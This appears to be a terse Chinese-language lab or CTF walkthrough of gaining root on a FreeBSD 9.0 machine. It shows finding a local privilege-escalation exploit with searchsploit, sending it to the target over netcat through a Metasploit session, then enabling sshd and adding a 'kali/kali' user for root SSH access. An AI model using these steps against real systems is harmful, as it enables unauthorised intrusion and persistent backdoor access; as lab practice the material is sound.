拿到root权限
-
之前的努力,最终获得了两个session
-
尝试看看该操作系统的漏洞
kali:
searchsploit freebsd 9.0
cp /usr/share/exploitdb/exploits/freebsd/local/28718.c ./Desktop/
cd Desktop/
nc -lp 5656 < 28718.c -q 1
msf session:
提权成功
echo '' >> freebsd.c 之前编译报错,所以加个空行
- 尝试修改root密码
看来高兴早了
修改ssh配置
echo sshd_enable="YES" >> /etc/rc.conf
/etc/rc.d/sshd start
/etc/rc.conf: sshd.enable=YES: not found
Starting sshd.
添加用户(kali/kali):
adduser
...
测试连接:
尝试一些操作:
$ cd /root/
$ touch test.txt
touch: test.txt: Permission denied
再次提权:
再次ssh以root登录: